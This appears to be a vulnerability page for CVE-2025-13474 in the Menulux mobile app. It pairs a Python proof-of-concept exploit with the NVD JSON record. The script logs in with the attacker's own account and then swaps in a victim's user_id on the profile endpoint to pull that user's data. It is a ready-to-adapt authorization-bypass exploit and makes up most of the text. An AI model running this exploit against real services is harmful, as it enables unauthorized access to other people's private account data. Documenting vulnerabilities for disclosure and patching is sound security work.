CVE-2025-13474

#!/usr/bin/env python3 # CVE-2025-13474 PoC - Menulux Mobile App Authorization Bypass # This PoC demonstrates how an attacker can bypass authorization by modifying user-controlled keys import requests import json TARGET_URL = "https://api.menulux-app.com" # Replace with actual API endpoint ATTACKER_USER_ID = 1001 # Attacker's legitimate user ID TARGET_USER_ID = 1002 # Target victim's user ID def exploit_authorization_bypass(): """ Exploit CVE-2025-13474 by modifying user-controlled identifier """ print("[*] CVE-2025-13474 Authorization Bypass Exploit") print("[*] Target: Menulux Mobile App < 9.5.8") # Step 1: Attacker authenticates and obtains session print("\n[Step 1] Attacker authenticates with own account") auth_data = { "username": "[email protected]", "password": "attacker_password" } auth_response = requests.post(f"{TARGET_URL}/api/auth/login", json=auth_data) if auth_response.status_code == 200: session_token = auth_response.json().get("session_token") user_id = auth_response.json().get("user_id") print(f"[+] Authenticated as user ID: {user_id}") print(f"[+] Session token: {session_token}") else: print("[-] Authentication failed") return # Step 2: Modify user-controlled identifier to target user print(f"\n[Step 2] Modifying user_id from {ATTACKER_USER_ID} to {TARGET_USER_ID}") headers = { "Authorization": f"Bearer {session_token}", "Content-Type": "application/json" } # Vulnerable request - user_id is user-controlled vulnerable_endpoint = f"{TARGET_URL}/api/user/profile" exploit_payload = { "user_id": TARGET_USER_ID # Attacker-controlled key } # Step 3: Send exploit request print(f"\n[Step 3] Sending exploit request to {vulnerable_endpoint}") exploit_response = requests.get( vulnerable_endpoint, params=exploit_payload, headers=headers ) # Step 4: Analyze response print("\n[Step 4] Analyzing response...") if exploit_response.status_code == 200: data = exploit_response.json() print(f"[+] SUCCESS! Retrieved target user's data:") print(json.dumps(data, indent=2)) print("\n[!] Authorization bypass confirmed - attacker accessed other user's data") else: print(f"[-] Exploit failed - Status code: {exploit_response.status_code}") print(f"[-] Response: {exploit_response.text}") if __name__ == "__main__": exploit_authorization_bypass()

{"cve": {"id": "CVE-2025-13474", "sourceIdentifier": "[email protected]", "published": "2025-12-16T12:15:46.157", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Menulux Software Inc. Mobile App allows Exploitation of Trusted Identifiers.This issue affects Mobile App: before 9.5.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0457", "source": "[email protected]"}]}}